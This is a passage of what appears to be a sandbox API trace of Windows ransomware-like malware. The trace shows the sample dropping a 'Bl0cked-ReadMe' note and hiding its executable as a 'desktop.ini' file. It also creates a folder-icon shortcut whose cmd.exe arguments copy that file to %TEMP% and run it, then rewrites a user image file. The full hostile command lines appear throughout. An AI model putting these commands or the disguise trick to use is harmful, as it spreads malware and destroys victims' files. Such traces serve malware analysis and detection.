out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0192.496] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0192.497] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf54, dwThreadId=0x994)) returned 1 [0192.502] CloseHandle (hObject=0x1b4) returned 1 [0192.502] CloseHandle (hObject=0x120) returned 1 [0192.502] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\bl0cked-readme.rtf")) returned 0xffffffff [0192.502] GetLastError () returned 0x2 [0192.502] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0192.506] GetFileAttributesW 
(lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\bl0cked-readme.rtf")) returned 0x2020 [0192.506] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0192.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0192.506] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0192.506] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0192.506] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0192.507] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0192.507] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0192.507] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0192.507] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE 
\"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0192.507] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0192.507] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1") returned 0x23 [0192.508] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0192.508] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0192.508] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, 
lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa84, dwThreadId=0xb64)) returned 1 [0192.555] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0193.376] CloseHandle (hObject=0x120) returned 1 [0193.376] CloseHandle (hObject=0x1b4) returned 1 [0193.376] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.377] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0193.377] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0193.377] GetTickCount () returned 0x36f26 [0193.377] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=25016625348) returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.378] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE 
\"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0193.378] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0193.378] CharUpperBuffW (in: lpsz="explorer.exe \"User Account Pictures\" & type \"User Account Pictures\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x7b | out: lpsz="EXPLORER.EXE \"USER ACCOUNT PICTURES\" & TYPE \"USER ACCOUNT PICTURES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x7b [0193.378] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0193.378] CharUpperBuffW (in: lpsz="explorer.exe \"User Account Pictures\" & type \"User Account Pictures\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x7c | out: lpsz="EXPLORER.EXE \"USER ACCOUNT PICTURES\" & TYPE \"USER ACCOUNT PICTURES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x7c [0193.378] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0193.378] CoInitialize (pvReserved=0x0) returned 0x0 [0193.378] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0193.380] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0193.380] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0193.380] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0193.382] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"User Account Pictures\" & type \"User Account Pictures\\desktop.ini\" > \"%TEMP%\\clspquze.exe\" && \"%TEMP%\\clspquze.exe\"") returned 0x0 [0193.382] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0193.382] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0193.382] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0193.383] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures.lnk", fRemember=0) returned 0x0 [0193.446] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0193.446] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0193.446] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0193.446] CoUninitialize () [0193.446] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.446] ReleaseMutex (hMutex=0xf8) returned 1 [0193.446] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.447] ReleaseMutex (hMutex=0xf8) returned 1 [0193.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.447] ReleaseMutex (hMutex=0xf8) returned 1 [0193.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.447] ReleaseMutex (hMutex=0xf8) returned 1 [0193.447] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x120 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25023624464) returned 1 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbb50 [0193.448] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc038 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc038 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.450] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.450] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0193.450] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0193.451] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0193.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="user.bmp", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0193.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="user.bmp", cchWideChar=8, lpMultiByteStr=0x131322c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="user.bmp", lpUsedDefaultChar=0x0) returned 8 [0193.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc038 [0193.454] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 